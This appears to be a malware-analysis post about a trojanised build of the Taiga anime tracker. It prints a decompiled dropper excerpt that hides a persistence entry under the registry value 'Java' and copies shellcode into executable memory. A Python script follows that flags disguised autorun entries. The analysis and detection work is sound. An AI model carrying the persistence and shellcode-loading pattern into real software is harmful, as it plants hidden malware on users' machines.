Malware targeting viewers of Chinese porn cartoons. Modified version of Taiga (https://github.com/erengy/taiga/issues/489).
Masterpiece of code (F5 in IDA Pro):
// Decompiled (IDA F5) excerpt from the dropper; comments added for the reader
if ( GetModuleFileNameW(0, &Filename, 0x104u) != -1 )   // 0x104 = MAX_PATH: fetch the path of the running (trojanised) exe
  RegSetValueExW(phkResult, L"Java", 0, 1u, (const BYTE *)&Filename, 2 * wcslen(&Filename) + 2);   // type 1 = REG_SZ: store that path as a value named "Java" under the key already opened into phkResult; size is bytes incl. terminator
v4 = VirtualAlloc(0, 0x18Bu, 0x1000u, 0x40u);   // 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE: 0x18B bytes of RWX memory
qmemcpy(v4, &unk_412780, 0x18Bu);   // embedded shellcode blob copied into the RWX buffer before it is run
Attached: the modified Taiga and the downloader exe dropped by the above shellcode (itself also implemented through shellcode). I don't have the actual payload it downloads, but I also don't expect anything interesting from it (probably some retarded ransomware, which is not interesting at all in any case).
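The one thing in that snippet a responder can act on is the persistence entry: the dropper stores its own path under a value named "Java", so the value name says nothing about what actually starts. The following is an added triage script, not part of the post or of Taiga, that runs over a constructed text export in the shape of a `reg query ... /s` listing of the HKCU Run key (the post does not name the key; that it is a Run key, the sample paths and the value names are assumptions made for the example) and flags entries whose value name does not match the launched binary or whose binary sits outside the Program Files / Windows trees.

```python
"""Triage an autorun listing for entries whose name disguises what they launch.

Added example. Input is a constructed text export in the format produced by
`reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /s`; the
paths and entries are hypothetical, modelled on the dropper's "Java" value.
"""
import re

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed sample listing (hypothetical machine, hypothetical paths).
SAMPLE_EXPORT = rf"""
{RUN_KEY}
    OneDrive          REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Java              REG_SZ    C:\Users\alice\Downloads\Taiga\Taiga.exe
    SecurityHealth    REG_SZ    C:\Windows\system32\SecurityHealthSystray.exe
"""

# Directories a normal user cannot write to; anything else is worth a look.
TRUSTED_ROOTS = (r"c:\program files", r"c:\program files (x86)", r"c:\windows")

# `<name>   <REG_type>   <data>` as printed by reg query.
LINE_RE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(.*)$")

NAME_MISMATCH = "value name does not match binary name"
UNTRUSTED_PATH = "binary outside Program Files / Windows"


def first_exe(data: str) -> str:
    """Return the executable path from a value's data, quoted or unquoted."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:data.index('"', 1)]
    return data.split(" ")[0]


def exe_stem(path: str) -> str:
    """Lower-case file name without the .exe suffix."""
    name = path.rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def triage(export: str) -> dict:
    """Map each autorun value name to the list of reasons it looks suspicious.

    Entries with no reasons are omitted. Only REG_SZ values are examined;
    REG_EXPAND_SZ data would need environment-variable expansion first.
    """
    findings = {}
    for line in export.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(2) != "REG_SZ":
            continue
        name, _, data = m.groups()
        exe = first_exe(data)
        stem = exe_stem(exe)
        lname = name.lower()
        reasons = []
        # "Java" launching Taiga.exe: the entry name hides the real program.
        if lname not in stem and stem not in lname:
            reasons.append(NAME_MISMATCH)
        # Binary in a user-writable location (Downloads, AppData, ...).
        if not exe.lower().startswith(TRUSTED_ROOTS):
            reasons.append(UNTRUSTED_PATH)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in triage(SAMPLE_EXPORT).items():
        print(f"{name}: {'; '.join(reasons)}")
```

An entry that trips both checks, as "Java" does here, is the pattern the dropper leaves behind; a name match alone (OneDrive under AppData) is common for legitimate per-user software and is reported only as a lower-priority hint.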